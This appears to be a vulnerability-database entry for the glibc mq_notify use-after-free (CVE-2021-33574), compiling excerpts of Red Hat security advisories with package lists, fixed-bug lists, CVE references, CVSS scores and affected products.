glibc-langpack-st-2.28-164.el8.x86_64.rpm glibc-langpack-sv-2.28-164.el8.x86_64.rpm glibc-langpack-sw-2.28-164.el8.x86_64.rpm glibc-langpack-szl-2.28-164.el8.x86_64.rpm glibc-langpack-ta-2.28-164.el8.x86_64.rpm glibc-langpack-tcy-2.28-164.el8.x86_64.rpm glibc-langpack-te-2.28-164.el8.x86_64.rpm glibc-langpack-tg-2.28-164.el8.x86_64.rpm glibc-langpack-th-2.28-164.el8.x86_64.rpm glibc-langpack-the-2.28-164.el8.x86_64.rpm glibc-langpack-ti-2.28-164.el8.x86_64.rpm glibc-langpack-tig-2.28-164.el8.x86_64.rpm glibc-langpack-tk-2.28-164.el8.x86_64.rpm glibc-langpack-tl-2.28-164.el8.x86_64.rpm glibc-langpack-tn-2.28-164.el8.x86_64.rpm glibc-langpack-to-2.28-164.el8.x86_64.rpm glibc-langpack-tpi-2.28-164.el8.x86_64.rpm glibc-langpack-tr-2.28-164.el8.x86_64.rpm glibc-langpack-ts-2.28-164.el8.x86_64.rpm glibc-langpack-tt-2.28-164.el8.x86_64.rpm glibc-langpack-ug-2.28-164.el8.x86_64.rpm glibc-langpack-uk-2.28-164.el8.x86_64.rpm glibc-langpack-unm-2.28-164.el8.x86_64.rpm glibc-langpack-ur-2.28-164.el8.x86_64.rpm glibc-langpack-uz-2.28-164.el8.x86_64.rpm glibc-langpack-ve-2.28-164.el8.x86_64.rpm glibc-langpack-vi-2.28-164.el8.x86_64.rpm glibc-langpack-wa-2.28-164.el8.x86_64.rpm glibc-langpack-wae-2.28-164.el8.x86_64.rpm glibc-langpack-wal-2.28-164.el8.x86_64.rpm glibc-langpack-wo-2.28-164.el8.x86_64.rpm glibc-langpack-xh-2.28-164.el8.x86_64.rpm glibc-langpack-yi-2.28-164.el8.x86_64.rpm glibc-langpack-yo-2.28-164.el8.x86_64.rpm glibc-langpack-yue-2.28-164.el8.x86_64.rpm glibc-langpack-yuw-2.28-164.el8.x86_64.rpm glibc-langpack-zh-2.28-164.el8.x86_64.rpm glibc-langpack-zu-2.28-164.el8.x86_64.rpm glibc-locale-source-2.28-164.el8.x86_64.rpm glibc-minimal-langpack-2.28-164.el8.x86_64.rpm libnsl-2.28-164.el8.i686.rpm libnsl-2.28-164.el8.x86_64.rpm nscd-2.28-164.el8.x86_64.rpm nss_db-2.28-164.el8.i686.rpm nss_db-2.28-164.el8.x86_64.rpm
Red Hat Enterprise Linux CRB (v. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- Summary:
The Migration Toolkit for Containers (MTC) 1.6.3 is now available. Description:
The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):
2019088 - "MigrationController" CR displays syntax error when unquiescing applications 2021666 - Route name longer than 63 characters causes direct volume migration to fail 2021668 - "MigrationController" CR ignores the "cluster_subdomain" value for direct volume migration routes 2022017 - CVE-2021-3948 mig-controller: incorrect namespaces handling may lead to not authorized usage of Migration Toolkit for Containers (MTC) 2024966 - Manifests not used by Operator Lifecycle Manager must be removed from the MTC 1.6 Operator image 2027196 - "migration-controller" pod goes into "CrashLoopBackoff" state if an invalid registry route is entered on the "Clusters" page of the web console 2027382 - "Copy oc describe/oc logs" window does not close automatically after timeout 2028841 - "rsync-client" container fails during direct volume migration with "Address family not supported by protocol" error 2031793 - "migration-controller" pod goes into "CrashLoopBackOff" state if "MigPlan" CR contains an invalid "includedResources" resource 2039852 - "migration-controller" pod goes into "CrashLoopBackOff" state if "MigPlan" CR contains an invalid "destMigClusterRef" or "srcMigClusterRef"
- Description:
Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications. Bugs fixed (https://bugzilla.redhat.com/):
2050826 - CVE-2022-24348 gitops: Path traversal and dereference of symlinks when passing Helm value files
- Bugs fixed (https://bugzilla.redhat.com/):
1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment
- JIRA issues fixed (https://issues.jboss.org/):
LOG-1168 - Disable hostname verification in syslog TLS settings
LOG-1235 - Using HTTPS without a secret does not translate into the correct 'scheme' value in Fluentd
LOG-1375 - ssl_ca_cert should be optional
LOG-1378 - CLO should support sasl_plaintext(Password over http)
LOG-1392 - In fluentd config, flush_interval can't be set with flush_mode=immediate
LOG-1494 - Syslog output is serializing json incorrectly
LOG-1555 - Fluentd logs emit transaction failed: error_class=NoMethodError while forwarding to external syslog server
LOG-1575 - Rejected by Elasticsearch and unexpected json-parsing
LOG-1735 - Regression introducing flush_at_shutdown
LOG-1774 - The collector logs should be excluded in fluent.conf
LOG-1776 - fluentd total_limit_size sets value beyond available space
LOG-1822 - OpenShift Alerting Rules Style-Guide Compliance
LOG-1859 - CLO Should not error and exit early on missing ca-bundle when cluster wide proxy is not enabled
LOG-1862 - Unsupported kafka parameters when enabled Kafka SASL
LOG-1903 - Fix the Display of ClusterLogging type in OLM
LOG-1911 - CLF API changes to Opt-in to multiline error detection
LOG-1918 - Alert FluentdNodeDown always firing
LOG-1939 - Opt-in multiline detection breaks cloudwatch forwarding
- Description:
Red Hat OpenShift Container Storage is software-defined storage integrated with and optimized for the Red Hat OpenShift Container Platform. Red Hat OpenShift Container Storage is highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Container Storage provides a multicloud data management service with an S3 compatible API.
Bug Fix(es):
-
Previously, when the namespace store target was deleted, no alert was sent to the namespace bucket because of an issue in calculating the namespace bucket health. With this update, the issue in calculating the namespace bucket health is fixed and alerts are triggered as expected. (BZ#1993873)
-
Previously, the Multicloud Object Gateway (MCG) components performed slowly and there was a lot of pressure on the MCG components due to non-optimized database queries. With this update the non-optimized database queries are fixed which reduces the compute resources and time taken for queries. Bugs fixed (https://bugzilla.redhat.com/):
1993873 - [4.8.z clone] Alert NooBaaNamespaceBucketErrorState is not triggered when namespacestore's target bucket is deleted 2006958 - CVE-2020-26301 nodejs-ssh2: Command injection by calling vulnerable method with untrusted input
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: ACS 3.67 security and enhancement update Advisory ID: RHSA-2021:4902-01 Product: RHACS Advisory URL: https://access.redhat.com/errata/RHSA-2021:4902 Issue date: 2021-12-01 CVE Names: CVE-2018-20673 CVE-2019-5827 CVE-2019-13750 CVE-2019-13751 CVE-2019-17594 CVE-2019-17595 CVE-2019-18218 CVE-2019-19603 CVE-2019-20838 CVE-2020-12762 CVE-2020-13435 CVE-2020-14155 CVE-2020-16135 CVE-2020-24370 CVE-2020-27304 CVE-2021-3200 CVE-2021-3445 CVE-2021-3580 CVE-2021-3749 CVE-2021-3800 CVE-2021-3801 CVE-2021-20231 CVE-2021-20232 CVE-2021-20266 CVE-2021-22876 CVE-2021-22898 CVE-2021-22925 CVE-2021-23343 CVE-2021-23840 CVE-2021-23841 CVE-2021-27645 CVE-2021-28153 CVE-2021-29923 CVE-2021-32690 CVE-2021-33560 CVE-2021-33574 CVE-2021-35942 CVE-2021-36084 CVE-2021-36085 CVE-2021-36086 CVE-2021-36087 CVE-2021-39293 =====================================================================
- Summary:
Updated images are now available for Red Hat Advanced Cluster Security for Kubernetes (RHACS).
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
The release of RHACS 3.67 provides the following new features, bug fixes, security patches and system changes:
OpenShift Dedicated support
RHACS 3.67 is thoroughly tested and supported on OpenShift Dedicated on Amazon Web Services and Google Cloud Platform.
-
Use OpenShift OAuth server as an identity provider If you are using RHACS with OpenShift, you can now configure the built-in OpenShift OAuth server as an identity provider for RHACS.
-
Enhancements for CI outputs Red Hat has improved the usability of RHACS CI integrations. CI outputs now show additional detailed information about the vulnerabilities and the security policies responsible for broken builds.
-
Runtime Class policy criteria Users can now use RHACS to define the container runtime configuration that may be used to run a pod’s containers using the Runtime Class policy criteria.
Security Fix(es):
-
civetweb: directory traversal when using the built-in example HTTP form-based file upload mechanism via the mg_handle_form_request API (CVE-2020-27304)
-
nodejs-axios: Regular expression denial of service in trim function (CVE-2021-3749)
-
nodejs-prismjs: ReDoS vulnerability (CVE-2021-3801)
-
golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet (CVE-2021-29923)
-
helm: information disclosure vulnerability (CVE-2021-32690)
-
golang: archive/zip: malformed archive may cause panic or memory exhaustion (incomplete fix of CVE-2021-33196) (CVE-2021-39293)
-
nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe (CVE-2021-23343)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Bug Fixes The release of RHACS 3.67 includes the following bug fixes:
-
Previously, when using RHACS with the Compliance Operator integration, RHACS did not respect or populate Compliance Operator TailoredProfiles. This has been fixed.
-
Previously, the Alpine Linux package manager (APK) in Image policy looked for the presence of apk package in the image rather than the apk-tools package. This issue has been fixed.
System changes The release of RHACS 3.67 includes the following system changes:
- Scanner now identifies vulnerabilities in Ubuntu 21.10 images.
- The Port exposure method policy criteria now include route as an exposure method.
- The OpenShift: Kubeadmin Secret Accessed security policy now allows the OpenShift Compliance Operator to check for the existence of the Kubeadmin secret without creating a violation.
- The OpenShift Compliance Operator integration now supports using TailoredProfiles.
- The RHACS Jenkins plugin now provides additional security information.
- When you enable the environment variable ROX_NETWORK_ACCESS_LOG for Central, the logs contain the Request URI and X-Forwarded-For header values.
- The default uid:gid pair for the Scanner image is now 65534:65534.
- RHACS adds a new default Scope Manager role that includes minimum permissions to create and modify access scopes.
- If microdnf is part of an image or shows up in process execution, RHACS reports it as a security violation for the Red Hat Package Manager in Image or the Red Hat Package Manager Execution security policies.
- In addition to manually uploading vulnerability definitions in offline mode, you can now upload definitions in online mode.
- You can now format the output of the following roxctl CLI commands in table, csv, or JSON format: image scan, image check & deployment check
-
You can now use a regular expression for the deployment name while specifying policy exclusions
-
Solution:
To take advantage of these new features, fixes and changes, please upgrade Red Hat Advanced Cluster Security for Kubernetes to version 3.67.
- Bugs fixed (https://bugzilla.redhat.com/):
1956818 - CVE-2021-23343 nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe 1978144 - CVE-2021-32690 helm: information disclosure vulnerability 1992006 - CVE-2021-29923 golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet 1999784 - CVE-2021-3749 nodejs-axios: Regular expression denial of service in trim function 2005445 - CVE-2021-3801 nodejs-prismjs: ReDoS vulnerability 2006044 - CVE-2021-39293 golang: archive/zip: malformed archive may cause panic or memory exhaustion (incomplete fix of CVE-2021-33196) 2016640 - CVE-2020-27304 civetweb: directory traversal when using the built-in example HTTP form-based file upload mechanism via the mg_handle_form_request API
- JIRA issues fixed (https://issues.jboss.org/):
RHACS-65 - Release RHACS 3.67.0
- References:
https://access.redhat.com/security/cve/CVE-2018-20673 https://access.redhat.com/security/cve/CVE-2019-5827 https://access.redhat.com/security/cve/CVE-2019-13750 https://access.redhat.com/security/cve/CVE-2019-13751 https://access.redhat.com/security/cve/CVE-2019-17594 https://access.redhat.com/security/cve/CVE-2019-17595 https://access.redhat.com/security/cve/CVE-2019-18218 https://access.redhat.com/security/cve/CVE-2019-19603 https://access.redhat.com/security/cve/CVE-2019-20838 https://access.redhat.com/security/cve/CVE-2020-12762 https://access.redhat.com/security/cve/CVE-2020-13435 https://access.redhat.com/security/cve/CVE-2020-14155 https://access.redhat.com/security/cve/CVE-2020-16135 https://access.redhat.com/security/cve/CVE-2020-24370 https://access.redhat.com/security/cve/CVE-2020-27304 https://access.redhat.com/security/cve/CVE-2021-3200 https://access.redhat.com/security/cve/CVE-2021-3445 https://access.redhat.com/security/cve/CVE-2021-3580 https://access.redhat.com/security/cve/CVE-2021-3749 https://access.redhat.com/security/cve/CVE-2021-3800 https://access.redhat.com/security/cve/CVE-2021-3801 https://access.redhat.com/security/cve/CVE-2021-20231 https://access.redhat.com/security/cve/CVE-2021-20232 https://access.redhat.com/security/cve/CVE-2021-20266 https://access.redhat.com/security/cve/CVE-2021-22876 https://access.redhat.com/security/cve/CVE-2021-22898 https://access.redhat.com/security/cve/CVE-2021-22925 https://access.redhat.com/security/cve/CVE-2021-23343 https://access.redhat.com/security/cve/CVE-2021-23840 https://access.redhat.com/security/cve/CVE-2021-23841 https://access.redhat.com/security/cve/CVE-2021-27645 https://access.redhat.com/security/cve/CVE-2021-28153 https://access.redhat.com/security/cve/CVE-2021-29923 https://access.redhat.com/security/cve/CVE-2021-32690 https://access.redhat.com/security/cve/CVE-2021-33560 https://access.redhat.com/security/cve/CVE-2021-33574 https://access.redhat.com/security/cve/CVE-2021-35942 https://access.redhat.com/security/cve/CVE-2021-36084 https://access.redhat.com/security/cve/CVE-2021-36085 https://access.redhat.com/security/cve/CVE-2021-36086 https://access.redhat.com/security/cve/CVE-2021-36087 https://access.redhat.com/security/cve/CVE-2021-39293 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYafeGdzjgjWX9erEAQgZ8Q/9H5ov4ZfKZszdJu0WvRMetEt6DMU2RTZr Kjv4h4FnmsMDYYDocnkFvsRjcpdGxtoUShAqD6+FrTNXjPtA/v1tsQTJzhg4o50w tKa9T4aHfrYXjGvWgQXJJEGmGaYMYePUOv77x6pLfMB+FmgfOtb8kzOdNzAtqX3e lq8b2DrQuPSRiWkUgFM2hmS7OtUsqTIShqWu67HJdOY74qDN4DGp7GnG6inCrUjV x4/4X5Fb7JrAYiy57C5eZwYW61HmrG7YHk9SZTRYgRW0rfgLncVsny4lX1871Ch2 e8ttu0EJFM1EJyuCJwJd1Q+rhua6S1VSY+etLUuaYme5DtvozLXQTLUK31qAq/hK qnLYQjaSieea9j1dV6YNHjnvV0XGczyZYwzmys/CNVUxwvSHr1AJGmQ3zDeOt7Qz vguWmPzyiob3RtHjfUlUpPYeI6HVug801YK6FAoB9F2BW2uHVgbtKOwG5pl5urJt G4taizPtH8uJj5hem5nHnSE1sVGTiStb4+oj2LQonRkgLQ2h7tsX8Z8yWM/3TwUT PTBX9AIHwt8aCx7XxTeEIs0H9B1T9jYfy06o9H2547un9sBoT0Sm7fqKuJKic8N/ pJ2kXBiVJ9B4G+JjWe8rh1oC1yz5Q5/5HZ19VYBjHhYEhX4s9s2YsF1L1uMoT3NN T0pPNmsPGZY= =ux5P -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Bugs fixed (https://bugzilla.redhat.com/):
1948761 - CVE-2021-23369 nodejs-handlebars: Remote code execution when compiling untrusted compile templates with strict:true option 1956688 - CVE-2021-23383 nodejs-handlebars: Remote code execution when compiling untrusted compile templates with compat:true option
5
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "34"
},
{
"_id": null,
"model": "e-series santricity os controller",
"scope": "gte",
"trust": 1.0,
"vendor": "netapp",
"version": "11.0"
},
{
"_id": null,
"model": "e-series santricity os controller",
"scope": "lte",
"trust": 1.0,
"vendor": "netapp",
"version": "11.70.1"
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "cloud backup",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "glibc",
"scope": "eq",
"trust": 1.0,
"vendor": "gnu",
"version": "2.32"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "glibc",
"scope": "eq",
"trust": 1.0,
"vendor": "gnu",
"version": "2.33"
},
{
"_id": null,
"model": "solidfire baseboard management controller",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "33"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-33574"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "165286"
},
{
"db": "PACKETSTORM",
"id": "164863"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "166051"
},
{
"db": "PACKETSTORM",
"id": "164967"
},
{
"db": "PACKETSTORM",
"id": "165096"
},
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "PACKETSTORM",
"id": "165002"
},
{
"db": "PACKETSTORM",
"id": "165758"
}
],
"trust": 0.9
},
"cve": "CVE-2021-33574",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2021-33574",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-393646",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2021-33574",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-33574",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-202105-1666",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-393646",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2021-33574",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-393646"
},
{
"db": "VULMON",
"id": "CVE-2021-33574"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1666"
},
{
"db": "NVD",
"id": "CVE-2021-33574"
}
]
},
"description": {
"_id": null,
"data": "The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact. The vulnerability stems from the library\u0027s mq_notify function having a use-after-free feature. Bugs fixed (https://bugzilla.redhat.com/):\n\n1944888 - CVE-2021-21409 netty: Request smuggling via content-length header\n2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data\n2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way\n2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value\n\n5. Relevant releases/architectures:\n\nRed Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the name\nservice cache daemon (nscd) used by multiple programs on the system. \nWithout these libraries, the Linux system cannot function correctly. \n\nSecurity Fix(es):\n\n* glibc: Arbitrary read in wordexp() (CVE-2021-35942)\n\n* glibc: Use-after-free in addgetnetgrentX function in netgroupcache.c\n(CVE-2021-27645)\n\n* glibc: mq_notify does not handle separately allocated thread attributes\n(CVE-2021-33574)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.5 Release Notes linked from the References section. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the glibc library\nmust be restarted, or the system rebooted. Bugs fixed (https://bugzilla.redhat.com/):\n\n1871386 - glibc: Update syscall names for Linux 5.6, 5.7, and 5.8. \n1912670 - semctl SEM_STAT_ANY fails to pass the buffer specified by the caller to the kernel\n1927877 - CVE-2021-27645 glibc: Use-after-free in addgetnetgrentX function in netgroupcache.c [rhel-8]\n1930302 - glibc: provide IPPROTO_MPTCP definition\n1932589 - CVE-2021-27645 glibc: Use-after-free in addgetnetgrentX function in netgroupcache.c\n1935128 - glibc: Rebuild glibc after objcopy fix for bug 1928936 [rhel-8.5.0]\n1965408 - CVE-2021-33574 glibc: mq_notify does not handle separately allocated thread attributes\n1977975 - CVE-2021-35942 glibc: Arbitrary read in wordexp()\n\n6. Package List:\n\nRed Hat Enterprise Linux AppStream (v. 8):\n\nSource:\nglibc-2.28-164.el8.src.rpm\n\naarch64:\nglibc-2.28-164.el8.aarch64.rpm\nglibc-all-langpacks-2.28-164.el8.aarch64.rpm\nglibc-common-2.28-164.el8.aarch64.rpm\nglibc-debuginfo-2.28-164.el8.aarch64.rpm\nglibc-devel-2.28-164.el8.aarch64.rpm\nglibc-headers-2.28-164.el8.aarch64.rpm\nglibc-langpack-aa-2.28-164.el8.aarch64.rpm\nglibc-langpack-af-2.28-164.el8.aarch64.rpm\nglibc-langpack-agr-2.28-164.el8.aarch64.rpm\nglibc-langpack-ak-2.28-164.el8.aarch64.rpm\nglibc-langpack-am-2.28-164.el8.aarch64.rpm\nglibc-langpack-an-2.28-164.el8.aarch64.rpm\nglibc-langpack-anp-2.28-164.el8.aarch64.rpm\nglibc-langpack-ar-2.28-164.el8.aarch64.rpm\nglibc-langpack-as-2.28-164.el8.aarch64.rpm\nglibc-langpack-ast-2.28-164.el8.aarch64.rpm\nglibc-langpack-ayc-2.28-164.el8.aarch64.rpm\nglibc-langpack-az-2.28-164.el8.aarch64.rpm\nglibc-langpack-be-2.28-164.el8.aarch64.rpm\nglibc-langpack-bem-2.28-164.el8.aarch64.rpm\nglibc-langpack-ber-2.28-164.el8.aarch64.rpm\nglibc-langpack-bg-2.28-164.el8.aarch64.rpm\nglibc-langpack-bhb-2.28-164.el8.aarch64.rpm\nglibc-langpack-bho-2.28-164.el8.aarch64.rpm\nglibc-langpack-bi-2.28-164.el8.aarch64.rpm\nglibc-langpack-bn-2.28-164.el8.aarch64.rpm\nglibc-langpack-bo-2.28-164.el8.aarch64.rpm\nglibc-langpack-br-2.28-164.el8.aarch64.rpm\nglibc-langpack-brx-2.28-164.el8.aarch64.rpm\nglibc-langpack-bs-2.28-164.el8.aarch64.rpm\nglibc-langpack-byn-2.28-164.el8.aarch64.rpm\nglibc-langpack-ca-2.28-164.el8.aarch64.rpm\nglibc-langpack-ce-2.28-164.el8.aarch64.rpm\nglibc-langpack-chr-2.28-164.el8.aarch64.rpm\nglibc-langpack-cmn-2.28-164.el8.aarch64.rpm\nglibc-langpack-crh-2.28-164.el8.aarch64.rpm\nglibc-langpack-cs-2.28-164.el8.aarch64.rpm\nglibc-langpack-csb-2.28-164.el8.aarch64.rpm\nglibc-langpack-cv-2.28-164.el8.aarch64.rpm\nglibc-langpack-cy-2.28-164.el8.aarch64.rpm\nglibc-langpack-da-2.28-164.el8.aarch64.rpm\nglibc-langpack-de-2.28-164.el8.aarch64.rpm\nglibc-langpack-doi-2.28-164.el8.aarch64.rpm\nglibc-langpack-dsb-2.28-164.el8.aarch64.rpm\nglibc-langpack-dv-2.28-164.el8.aarch64.rpm\nglibc-langpack-dz-2.28-164.el8.aarch64.rpm\nglibc-langpack-el-2.28-164.el8.aarch64.rpm\nglibc-langpack-en-2.28-164.el8.aarch64.rpm\nglibc-langpack-eo-2.28-164.el8.aarch64.rpm\nglibc-langpack-es-2.28-164.el8.aarch64.rpm\nglibc-langpack-et-2.28-164.el8.aarch64.rpm\nglibc-langpack-eu-2.28-164.el8.aarch64.rpm\nglibc-langpack-fa-2.28-164.el8.aarch64.rpm\nglibc-langpack-ff-2.28-164.el8.aarch64.rpm\nglibc-langpack-fi-2.28-164.el8.aarch64.rpm\nglibc-langpack-fil-2.28-164.el8.aarch64.rpm\nglibc-langpack-fo-2.28-164.el8.aarch64.rpm\nglibc-langpack-fr-2.28-164.el8.aarch64.rpm\nglibc-langpack-fur-2.28-164.el8.aarch64.rpm\nglibc-langpack-fy-2.28-164.el8.aarch64.rpm\nglibc-langpack-ga-2.28-164.el8.aarch64.rpm\nglibc-langpack-gd-2.28-164.el8.aarch64.rpm\nglibc-langpack-gez-2.28-164.el8.aarch64.rpm\nglibc-langpack-gl-2.28-164.el8.aarch64.rpm\nglibc-langpack-gu-2.28-164.el8.aarch64.rpm\nglibc-langpack-gv-2.28-164.el8.aarch64.rpm\nglibc-langpack-ha-2.28-164.el8.aarch64.rpm\nglibc-langpack-hak-2.28-164.el8.aarch64.rpm\nglibc-langpack-he-2.28-164.el8.aarch64.rpm\nglibc-langpack-hi-2.28-164.el8.aarch64.rpm\nglibc-langpack-hif-2.28-164.el8.aarch64.rpm\nglibc-langpack-hne-2.28-164.el8.aarch64.rpm\nglibc-langpack-hr-2.28-164.el8.aarch64.rpm\nglibc-langpack-hsb-2.28-164.el8.aarch64.rpm\nglibc-langpack-ht-2.28-164.el8.aarch64.rpm\nglibc-langpack-hu-2.28-164.el8.aarch64.rpm\nglibc-langpack-hy-2.28-164.el8.aarch64.rpm\nglibc-langpack-ia-2.28-164.el8.aarch64.rpm\nglibc-langpack-id-2.28-164.el8.aarch64.rpm\nglibc-langpack-ig-2.28-164.el8.aarch64.rpm\nglibc-langpack-ik-2.28-164.el8.aarch64.rpm\nglibc-langpack-is-2.28-164.el8.aarch64.rpm\nglibc-langpack-it-2.28-164.el8.aarch64.rpm\nglibc-langpack-iu-2.28-164.el8.aarch64.rpm\nglibc-langpack-ja-2.28-164.el8.aarch64.rpm\nglibc-langpack-ka-2.28-164.el8.aarch64.rpm\nglibc-langpack-kab-2.28-164.el8.aarch64.rpm\nglibc-langpack-kk-2.28-164.el8.aarch64.rpm\nglibc-langpack-kl-2.28-164.el8.aarch64.rpm\nglibc-langpack-km-2.28-164.el8.aarch64.rpm\nglibc-langpack-kn-2.28-164.el8.aarch64.rpm\nglibc-langpack-ko-2.28-164.el8.aarch64.rpm\nglibc-langpack-kok-2.28-164.el8.aarch64.rpm\nglibc-langpack-ks-2.28-164.el8.aarch64.rpm\nglibc-langpack-ku-2.28-164.el8.aarch64.rpm\nglibc-langpack-kw-2.28-164.el8.aarch64.rpm\nglibc-langpack-ky-2.28-164.el8.aarch64.rpm\nglibc-langpack-lb-2.28-164.el8.aarch64.rpm\nglibc-langpack-lg-2.28-164.el8.aarch64.rpm\nglibc-langpack-li-2.28-164.el8.aarch64.rpm\nglibc-langpack-lij-2.28-164.el8.aarch64.rpm\nglibc-langpack-ln-2.28-164.el8.aarch64.rpm\nglibc-langpack-lo-2.28-164.el8.aarch64.rpm\nglibc-langpack-lt-2.28-164.el8.aarch64.rpm\nglibc-langpack-lv-2.28-164.el8.aarch64.rpm\nglibc-langpack-lzh-2.28-164.el8.aarch64.rpm\nglibc-langpack-mag-2.28-164.el8.aarch64.rpm\nglibc-langpack-mai-2.28-164.el8.aarch64.rpm\nglibc-langpack-mfe-2.28-164.el8.aarch64.rpm\nglibc-langpack-mg-2.28-164.el8.aarch64.rpm\nglibc-langpack-mhr-2.28-164.el8.aarch64.rpm\nglibc-langpack-mi-2.28-164.el8.aarch64.rpm\nglibc-langpack-miq-2.28-164.el8.aarch64.rpm\nglibc-langpack-mjw-2.28-164.el8.aarch64.rpm\nglibc-langpack-mk-2.28-164.el8.aarch64.rpm\nglibc-langpack-ml-2.28-164.el8.aarch64.rpm\nglibc-langpack-mn-2.28-164.el8.aarch64.rpm\nglibc-langpack-mni-2.28-164.el8.aarch64.rpm\nglibc-langpack-mr-2.28-164.el8.aarch64.rpm\nglibc-langpack-ms-2.28-164.el8.aarch64.rpm